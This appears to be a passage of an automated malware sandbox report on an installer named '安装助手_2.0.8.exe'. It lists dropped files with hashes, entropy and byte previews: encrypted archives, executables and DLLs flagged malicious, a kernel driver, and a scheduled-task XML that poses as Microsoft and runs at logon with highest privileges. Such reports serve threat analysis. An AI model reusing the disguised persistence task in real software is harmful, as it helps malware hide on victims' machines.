                                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                          Malicious:false
                                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996966859255979
                                          Encrypted:true
                                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                          MD5:4CB8B7E557C80FC7B014133AB834A042
                                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                          Malicious:false
                                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):31890
                                          Entropy (8bit):7.99402458740637
                                          Encrypted:true
                                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                          MD5:8622FC7228777F64A47BD6C61478ADD9
                                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                          Malicious:false
                                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):31890
                                          Entropy (8bit):7.99402458740637
                                          Encrypted:true
                                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                          Malicious:false
                                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):74960
                                          Entropy (8bit):7.99759370165655
                                          Encrypted:true
                                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                          MD5:950338D50B95A25F494EE74E97B7B7A9
                                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                          Malicious:false
                                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):74960
                                          Entropy (8bit):7.997593701656546
                                          Encrypted:true
                                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                          Malicious:false
                                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):29730
                                          Entropy (8bit):7.994290657653607
                                          Encrypted:true
                                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                          Malicious:false
                                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):29730
                                          Entropy (8bit):7.994290657653608
                                          Encrypted:true
                                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                          Malicious:false
                                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):249984
                                          Entropy (8bit):7.999215745260695
                                          Encrypted:true
                                          SSDEEP:6144:vAAk5v7IVF5HKAnfHvD74J8OxH2shtRWfRloy:g7IDDnfHvDEJ3HDo3
                                          MD5:8B03F1D18D9CE4A4745FC523250F9F4F
                                          SHA1:3D6B746CAD2263712C36D0F1FFEAD37338605287
                                          SHA-256:8E8F65F8C8AAB82671C7D6AE134444158260903922635E9E24CAE3F484A6484A
                                          SHA-512:48906663A2AE73976FC9E1484CC950871D6EB3BB67D8748FE40199EEB8C2367D29B64EDE40887E8F899F40AA249333326027238B4EC380A99F431E5D93BF0410
                                          Malicious:false
                                          Preview:7z..'....... .......@........9.Br........~RFY..R.F.B..mXf.....W[....v&`D.L..hg...^6L..fE...>.....9........'.?Q......#..(^d..].Q,..ykr..... 4.r....c..f.k...:/5Y.+y_......8..u.A)[cI..qo5 *]G2E+...3.P.._.C"|.V..7R..6.M...V..E7.....cE..v5.~..>.p.M.D.a....P".bCg...R..#.....<.{.B. .z..I....f\.......`..`t...Z.....2...;.8&.^..r....h..U......x.w...>xc......E.*_=..,....,<.('"........a.iR.W E.T.a&GWI..L. q]d.b~h...4.6Zy.{.C....*...:#...C.d..>..Gy..&.u@..Rk.W...<..e.Rq..i........,s....'3..I.D.........$m..).i$0..i....kyszw.......rm........<K."..Zl^.......cC.Ztvv...W.\.2..R.i..Wl*..*h.Z=!.rjdL..!.0W.......&..N...F..*....D.4~@.G..~.g.."X.<k..,..s._..V}A.....&.C.H.4R.(...j...=...R..t...rMK..J....#....&\.+U..X..J.dJ.J..'..b`.....k. ......Rz.]..p.....b.+..-.\.L.eC'Hq.2...U.N<...C. ../\|$.+0K"...=..QR..K.xCm.~..-....[M...[Ia.O.#..Z..%.U...]...,Je@*?....W.,.\...E.f..".q..@jy......y-r.Ef5|..r.F..;D.v=..h..@.GJ.{.9B K....W...hh..Pt..~...,ct.....o........^.YMb.D.....
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):63640
                                          Entropy (8bit):6.482810107683822
                                          Encrypted:false
                                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 9%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):3.3449406240731085
                                          Encrypted:false
                                          SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                                          MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                                          SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                                          SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                                          SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                                          Malicious:false
                                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                          Category:dropped
                                          Size (bytes):5649408
                                          Entropy (8bit):6.392614480390128
                                          Encrypted:false
                                          SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                          MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                          SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                          SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                          SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:Nlllul/nq/llh:NllUyt
                                          MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                          SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                          SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                          SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                          Malicious:false
                                          Preview:@...e................................................@..........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):6144
                                          Entropy (8bit):4.720366600008286
                                          Encrypted:false
                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3598848
                                          Entropy (8bit):7.004949099807939
                                          Encrypted:false
                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3366912
                                          Entropy (8bit):6.530548291878271
                                          Encrypted:false
                                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                          MD5:9902FA6D39184B87AED7D94A037912D8
                                          SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                          SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                          SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):6144
                                          Entropy (8bit):4.720366600008286
                                          Encrypted:false
                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
